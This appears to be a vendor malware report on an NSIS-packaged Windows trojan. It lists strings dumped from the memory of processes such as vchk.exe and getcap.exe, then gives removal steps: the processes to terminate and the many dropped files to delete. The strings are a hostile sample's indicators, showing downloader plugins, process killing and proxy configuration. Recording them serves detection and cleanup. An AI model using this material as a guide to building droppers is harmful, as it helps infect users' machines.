hXXp://nsis.sf.net/NSIS_Error
... %d%%
~nsu.tmp
%u.%u%s%s
RegDeleteKeyExA
%s=%s
*?|<>/":
%Program Files%\Google\Chrome\Application\chrome.exe
e.exe
a\Google\Chrome\Application\chrome.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsp8.tmp\FindProcDLL.dll
DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsp8.tmp
on\Internet Settings AutoConfigURL
DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsp8.tmp\FindProcDLL.dll
@.reloc
u.Uj@
MSVCRT.dll
HttpSendRequestA
HttpSendRequestExA
HttpQueryInfoA
FtpCreateDirectoryA
FtpOpenFileA
HttpOpenRequestA
HttpAddRequestHeadersA
HttpEndRequestA
InternetCrackUrlA
WININET.dll
inetc.dll
Open URL Error
URL Parts Error
FtpCreateDir failed (550)
Error FTP path (550)
Downloading %s
%dkB (%d%%) of %dkB @ %d.dkB/s
(%d %s%s remaining)
REST %d
SIZE %s
Content-Length: %d
Content-Type: application/x-www-form-urlencoded
Authorization: basic %s
Proxy-authorization: basic %s
%s:%s
FtpCommandA
wininet.dll
%u MB
%u kB
%u bytes
%d:d:d
%s - %s
(Err=%d)
NSIS_Inetc (Mozilla)
Filename: %s
/password
Uploading %s
9!9-9B9}9
!%[ %S
g.ZO||k[
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsp8.tmp
nsp8.tmp
ogram Files\Google\Chrome\Application\chrome.exe
\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsp8.tmp
C:\a\wcheckf.exe
wcheckf.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsp7.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v2.46</description><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/></application></compatibility></assembly>

wincheckfe.exe_1676_rwx_10004000_00001000:

callback%d

wcheckf.exe_660_rwx_10004000_00001000:

callback%d

winonit.exe_892:

.text
`.rdata
@.data
.ndata
.rsrc
uDSSh
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationA
ShellExecuteA
SHELL32.dll
RegEnumKeyA
RegCreateKeyExA
RegCloseKey
RegDeleteKeyA
RegOpenKeyExA
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
verifying installer: %d%%
hXXp://nsis.sf.net/NSIS_Error
... %d%%
~nsu.tmp
%u.%u%s%s
RegDeleteKeyExA
%s=%s
*?|<>/":
%Documents and Settings%\%current user%\Local Settings\Application Data\yuntnani\vchk.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsvA.tmp\KillProcDLL.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsvA.tmp
.reloc
Kernel32.DLL
PSAPI.DLL
MSVCRT.dll
KillProcDLL.dll
u.Uj@
HttpSendRequestA
HttpSendRequestExA
HttpQueryInfoA
FtpCreateDirectoryA
FtpOpenFileA
HttpOpenRequestA
HttpAddRequestHeadersA
HttpEndRequestA
InternetCrackUrlA
WININET.dll
inetc.dll
Open URL Error
URL Parts Error
FtpCreateDir failed (550)
Error FTP path (550)
Downloading %s
%dkB (%d%%) of %dkB @ %d.dkB/s
(%d %s%s remaining)
REST %d
SIZE %s
Content-Length: %d
Content-Type: application/x-www-form-urlencoded
Authorization: basic %s
Proxy-authorization: basic %s
%s:%s
FtpCommandA
wininet.dll
%u MB
%u kB
%u bytes
%d:d:d
%s - %s
(Err=%d)
NSIS_Inetc (Mozilla)
Filename: %s
/password
Uploading %s
9!9-9B9}9
\.lR%
g.ZO||k[
C:\a\avv.txt
avv.txt
m\LOCALS~1\Temp\nsvA.tmp
ments and Settings\"%CurrentUserName%"\Local Settings\Application Data\yuntnani\vchk.exe
\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsvA.tmp
C:\a\winonit.exe
winonit.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsv9.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v2.46</description><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/></application></compatibility></assembly>

winonit.exe_892_rwx_10004000_00001000:

callback%d

getcap.exe_1236:

.text
`.rdata
@.data
.ndata
.rsrc
uDSSh
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationA
ShellExecuteA
SHELL32.dll
RegEnumKeyA
RegCreateKeyExA
RegCloseKey
RegDeleteKeyA
RegOpenKeyExA
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
verifying installer: %d%%
hXXp://nsis.sf.net/NSIS_Error
... %d%%
~nsu.tmp
%u.%u%s%s
RegDeleteKeyExA
%s=%s
*?|<>/":
\a\7za.exe
S~1\Temp\nswE.tmp\System.dll
UME~1\"%CurrentUserName%"\LOCALS~1\Temp\nswE.tmp\System.dll
C:\a\ukey.ini
7za.exe
E~1\"%CurrentUserName%"\LOCALS~1\Temp\nswE.tmp\System.dll
GetCPInfo
MB, # %s =
RAM %s
Data Error in encrypted file. Wrong password?
CRC Failed in encrypted file. Wrong password?
Unsupported Method
Can not open encrypted archive. Wrong password?
Unsupported archive type
-p{Password}: set Password
is not supported archive
Enter password (will not be echoed):
Advapi32.dll
kernel32.dll
update operations are not supported for this archive
Mapi32.dll
lzma 7z ace arc arj bz bz2 deb lzo lzx gz pak rpm sit tgz tbz tbz2 tgz cab ha lha lzh rar zoo zip jar ear war msi 3gp avi mov mpeg mpg mpe wmv aac ape fla flac la mp3 m4a mp4 ofr ogg pac ra rm rka shn swa tta wv wma wav swf chm hxi hxs gif jpeg jpg jp2 png tiff bmp ico psd psp awg ps eps cgm dxf svg vrml wmf emf ai md cad dwg pps key sxi max 3ds iso bin nrg mdf img pdi tar cpio xpi vfd vhd vud vmc vsv vmdk dsk nvram vmem vmsd vmsn vmss vmtm inl inc idl acf asa h hpp hxx c cpp cxx rc java cs pas bas vb cls ctl frm dlg def f77 f f90 f95 asm sql manifest dep mak clw csproj vcproj sln dsp dsw class bat cmd xml xsd xsl xslt hxk hxc htm html xhtml xht mht mhtml htw asp aspx css cgi jsp shtml awk sed hta js php php3 php4 php5 phptml pl pm py pyo rb sh tcl vbs text txt tex ans asc srt reg ini doc docx mcw dot rtf hlp xls xlr xlt xlw ppt pdf sxc sxd sxi sxg sxw stc sti stw stm odt ott odg otg odp otp ods ots odf abw afp cwk lwp wpd wps wpt wrf wri abf afm bdf fon mgf otf pcf pfa snf ttf dbf mdb nsf ntf wdb db fdb gdb exe dll ocx vbx sfx sys tlb awx com obj lib out o so pdb pch idb ncb opt
OLEAUT32.dll
GetWindowsDirectoryW
E%SsK*X|
, .MN6b
1%uhx
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nswE.tmp
ukey.ini
\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nswE.tmp
C:\a\getcap.exe
getcap.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nswD.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v2.46</description><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/></application></compatibility></assembly>
H7zCon.sfx
7-Zip cannot load Mapi32.dll
A* * .tar .tar
B* .tar

getcap.exe_1236_rwx_10004000_00001000:

callback%d

vchk.exe_232:

.text
`.rdata
@.data
.ndata
.rsrc
uDSSh
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationA
ShellExecuteA
SHELL32.dll
RegEnumKeyA
RegCreateKeyExA
RegCloseKey
RegDeleteKeyA
RegOpenKeyExA
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
verifying installer: %d%%
hXXp://nsis.sf.net/NSIS_Error
... %d%%
~nsu.tmp
%u.%u%s%s
RegDeleteKeyExA
%s=%s
*?|<>/":
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsr10.tmp\nsExec.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsr10.tmp\nsExec.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsr10.tmp
.reloc
SShL0
PeekNamedPipe
CreatePipe
nsExec.dll
99|9
: :0:5:>:
u.Uj@
MSVCRT.dll
HttpSendRequestA
HttpSendRequestExA
HttpQueryInfoA
FtpCreateDirectoryA
FtpOpenFileA
HttpOpenRequestA
HttpAddRequestHeadersA
HttpEndRequestA
InternetCrackUrlA
WININET.dll
inetc.dll
Open URL Error
URL Parts Error
FtpCreateDir failed (550)
Error FTP path (550)
Downloading %s
%dkB (%d%%) of %dkB @ %d.dkB/s
(%d %s%s remaining)
REST %d
SIZE %s
Content-Length: %d
Content-Type: application/x-www-form-urlencoded
Authorization: basic %s
Proxy-authorization: basic %s
%s:%s
FtpCommandA
wininet.dll
%u MB
%u kB
%u bytes
%d:d:d
%s - %s
(Err=%d)
NSIS_Inetc (Mozilla)
Filename: %s
/password
Uploading %s
9!9-9B9}9
g.ZO||k[
C:\a\avchk.txt
avchk.txt
\LOCALS~1\Temp\nsr10.tmp
hk.txt
96b4e010aa.exe
025.exe
"%Documents and Settings%\%current user%\Local Settings\Application Data\yuntnani\vchk.exe"
%Documents and Settings%\%current user%\Local Settings\Application Data\yuntnani
vchk.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsrF.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
%Documents and Settings%\%current user%\Local Settings\Application Data\yuntnani\vchk.exe
5596b4e010aa.exe
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v2.46</description><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/></application></compatibility></assembly>

vchk.exe_232_rwx_10004000_00001000:

callback%d


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    WMIC.exe:3044
    vchk.exe:456
    taskkill.exe:2712
    taskkill.exe:3924
    taskkill.exe:3712
    taskkill.exe:1612
    taskkill.exe:760
    taskkill.exe:3288
    taskkill.exe:2968
    taskkill.exe:2524
    taskkill.exe:1948
    taskkill.exe:2520
    taskkill.exe:2324
    taskkill.exe:1940
    taskkill.exe:2328
    taskkill.exe:2248
    taskkill.exe:2400
    taskkill.exe:2292
    taskkill.exe:3996
    taskkill.exe:2844
    taskkill.exe:2408
    taskkill.exe:3760
    taskkill.exe:3488
    taskkill.exe:3836
    taskkill.exe:3764
    taskkill.exe:2708
    taskkill.exe:3832
    taskkill.exe:2852
    taskkill.exe:1152
    taskkill.exe:3400
    taskkill.exe:1496
    taskkill.exe:264
    taskkill.exe:3408
    taskkill.exe:3644
    taskkill.exe:2996
    taskkill.exe:3244
    taskkill.exe:4080
    taskkill.exe:2412
    taskkill.exe:3844
    taskkill.exe:412
    taskkill.exe:2792
    taskkill.exe:2148
    taskkill.exe:3948
    taskkill.exe:2476
    taskkill.exe:1324
    taskkill.exe:3820
    taskkill.exe:3276
    taskkill.exe:1924
    taskkill.exe:3308
    taskkill.exe:2600
    taskkill.exe:3208
    taskkill.exe:3676
    taskkill.exe:4044
    taskkill.exe:2308
    taskkill.exe:4040
    taskkill.exe:2780
    taskkill.exe:1852
    taskkill.exe:2304
    taskkill.exe:3388
    taskkill.exe:3008
    taskkill.exe:2380
    taskkill.exe:2664
    taskkill.exe:2660
    taskkill.exe:1652
    taskkill.exe:2260
    taskkill.exe:3744
    taskkill.exe:2200
    taskkill.exe:3584
    taskkill.exe:3556
    taskkill.exe:2280
    taskkill.exe:2448
    taskkill.exe:304
    taskkill.exe:3508
    taskkill.exe:4056
    taskkill.exe:2044
    taskkill.exe:2576
    taskkill.exe:3468
    taskkill.exe:2376
    taskkill.exe:432
    taskkill.exe:2484
    taskkill.exe:2616
    taskkill.exe:2596
    taskkill.exe:2920
    taskkill.exe:336
    taskkill.exe:1228
    taskkill.exe:2192
    taskkill.exe:3000
    taskkill.exe:3168
    taskkill.exe:172
    taskkill.exe:3452
    taskkill.exe:484
    taskkill.exe:2056
    taskkill.exe:2564
    taskkill.exe:3012
    taskkill.exe:2368
    taskkill.exe:3892
    taskkill.exe:2680
    taskkill.exe:3080
    taskkill.exe:2116
    taskkill.exe:3600
    taskkill.exe:2812
    taskkill.exe:3876
    taskkill.exe:3524
    taskkill.exe:3076
    taskkill.exe:2184
    taskkill.exe:220
    taskkill.exe:2216
    taskkill.exe:3200
    taskkill.exe:2896
    taskkill.exe:2892
    taskkill.exe:3500
    taskkill.exe:3964
    taskkill.exe:2108
    taskkill.exe:2692
    taskkill.exe:2104
    taskkill.exe:2860
    taskkill.exe:3868
    taskkill.exe:3900
    taskkill.exe:3636
    taskkill.exe:2636
    taskkill.exe:3632
    taskkill.exe:2436
    taskkill.exe:3060
    taskkill.exe:236
    taskkill.exe:4008
    taskkill.exe:2340
    taskkill.exe:1616
    taskkill.exe:3432
    taskkill.exe:4004
    taskkill.exe:3928
    taskkill.exe:2744
    taskkill.exe:1560
    taskkill.exe:2748
    taskkill.exe:2504
    taskkill.exe:1564
    taskkill.exe:3624
    taskkill.exe:2728
    taskkill.exe:3356
    taskkill.exe:3932
    taskkill.exe:3228
    taskkill.exe:2336
    taskkill.exe:3116
    taskkill.exe:3788
    taskkill.exe:3548
    taskkill.exe:2084
    taskkill.exe:2224
    taskkill.exe:1764
    %original file name%.exe:348

  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    C:\a\avv.txt (2432 bytes)
    C:\a\ahho.txt (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsvA.tmp\System.dll (11 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\IYXZ7PKS\hho[1].htm (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsvA.tmp\KillProcDLL.dll (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsvA.tmp\inetc.dll (20 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\HQR7BMVW\uur[1].htm (2 bytes)
    C:\a\auur.txt (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ML3M60RP\vv[1].htm (2432 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\HQR7BMVW\localhost[1].htm (716 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsc13.tmp\nsExec.dll (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\EG9650tGGrxO3Eyr78zW.html (716 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsc13.tmp\inetc.dll (20 bytes)
    C:\a\1loogg2.txt (170 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsc13.tmp\System.dll (11 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\apEG9650tGGrxO3Eyr78zW.html (324 bytes)
    C:\a\1logff.txt (718 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ML3M60RP\ckkk[1].htm (303 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsc13.tmp\ns29.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\8MWF95DD\ckkkp[1].htm (324 bytes)
    C:\a\vv11111.txt (26514 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\aEG9650tGGrxO3Eyr78zW.html (303 bytes)
    C:\a\7za.exe (15192 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nswE.tmp\System.dll (11 bytes)
    %Program Files%\FastInternet\TempWmicBatchFile.bat (0 bytes)
    C:\a\ProcessList.txt (1888 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nse6.tmp\System.dll (11 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nse6.tmp\FindProcDLL.dll (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\yuntnani\vchk.exe (3808 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsp8.tmp\FindProcDLL.dll (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsp8.tmp\System.dll (11 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\IYXZ7PKS\vchk[1].exe (3808 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsp8.tmp\inetc.dll (20 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\nsAC.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns6F.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\nsB3.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\nsB6.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns74.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\nsA8.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns95.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns8F.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\nsAA.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns40.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\nsA2.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\nsA5.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\nsAF.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns6B.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns34.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns21.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns2C.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\nsA1.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns5D.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns5A.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns7F.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns78.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns83.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns54.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns51.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns91.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns46.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns7E.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns8E.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns2B.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns67.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\nsA3.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns82.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns88.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns35.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns7A.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns6A.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns3E.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns4C.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns4A.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns58.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns76.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns38.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns2D.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns33.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns60.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns3A.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns52.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\nsB1.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns75.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\nsA0.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns26.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\nsA9.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns43.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns9B.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns99.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns5F.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\nsB0.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns2A.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\nsAB.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns1B.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns31.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns20.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns5C.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns1A.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\nsAD.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\nsB5.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns8C.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns66.tmp (6 bytes)
    C:\a\avchk.txt (1885 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns9C.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns36.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns41.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns32.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns96.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns93.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns49.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns28.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns6E.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\nsA6.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns2E.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns1C.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns84.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns3B.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns86.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns11.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns50.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns16.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns68.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns9E.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns97.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns81.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns59.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns53.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns45.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns8A.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns25.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns48.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns2F.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns15.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns85.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns42.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns3F.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns3D.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\inetc.dll (20 bytes)
